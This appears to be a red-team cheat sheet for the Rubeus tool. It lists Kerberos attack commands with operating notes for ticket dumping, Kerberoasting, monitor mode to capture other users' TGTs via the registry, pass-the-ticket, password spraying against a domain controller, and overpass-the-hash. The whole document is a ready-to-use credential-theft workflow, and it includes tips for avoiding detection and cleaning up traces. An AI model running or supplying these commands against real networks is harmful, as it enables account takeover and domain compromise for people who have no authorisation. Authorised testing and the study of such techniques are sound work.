Rubeus.exe
Dump tickets
Lists the Kerberos tickets cached on the box; /service:krbtgt limits output to TGTs and /nowrap keeps each base64 blob on a single line so it can be copied straight into ptt. From a non-elevated context you only see your own logon session; run it elevated (high integrity or SYSTEM) to dump every session's tickets.
rubeus.exe dump /service:krbtgt /nowrap
Kerberoasting attack
Pulls every user account with an SPN via LDAP, requests a service ticket for each, and writes the crackable hashes to the file. /simple emits just the hash lines (hashcat $krb5tgs$ format by default; add /format:john for John).
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
Monitor mode
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other users' TGTs: monitor polls for new logon sessions every /interval seconds for /runfor seconds and extracts the TGT of each new session. Because a WinRM shell gives you no interactive output to watch, /registry writes the captured tickets to HKLM\SOFTWARE\MONITOR so you can collect them afterwards. It needs an elevated context to read other sessions' tickets, and the registry key is not removed for you, so clean it up when you're done (reg delete HKLM\SOFTWARE\MONITOR /f).
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to export the whole key (the export is a UTF-16 .reg file you can pull back and parse offline).
Grab the TGTs from registry
reg export HKLM\SOFTWARE\MONITOR backup1.reg
The values Rubeus stores are base64-encoded .kirbi (KRB-CRED) tickets, so Rubeus can pass them as-is. For other tooling, use something like rubeus2ccache to convert them to .kirbi files (Mimikatz) or ccache (impacket). Then you can use rubeus to pass the TGT.
Pass-the-ticket
/ticket takes either the base64 blob from dump/monitor or a path to a .kirbi file, and injects it into your current logon session (add /luid:0x... from an elevated context to target another session).
rubeus.exe ptt /ticket:xxx
Password spraying
The Rubeus action is brute (there is no spray action): with a single /password it sprays that password across every domain user it can enumerate over LDAP (or a list given with /users:), authenticating via Kerberos pre-auth against the DC. Successful users are written to /outfile; /noticket stops it dumping a TGT for each hit. Check the lockout policy first, since each attempt counts as a failed logon.
rubeus.exe brute /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt /noticket
Request a TGT
Overpass-the-hash: request a TGT for the user with their NTLM hash via /rc4 (use /aes256:KEY instead where you have the AES key, since RC4 pre-auth stands out in modern domains). Add /ptt to inject the resulting ticket straight into the current session.
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap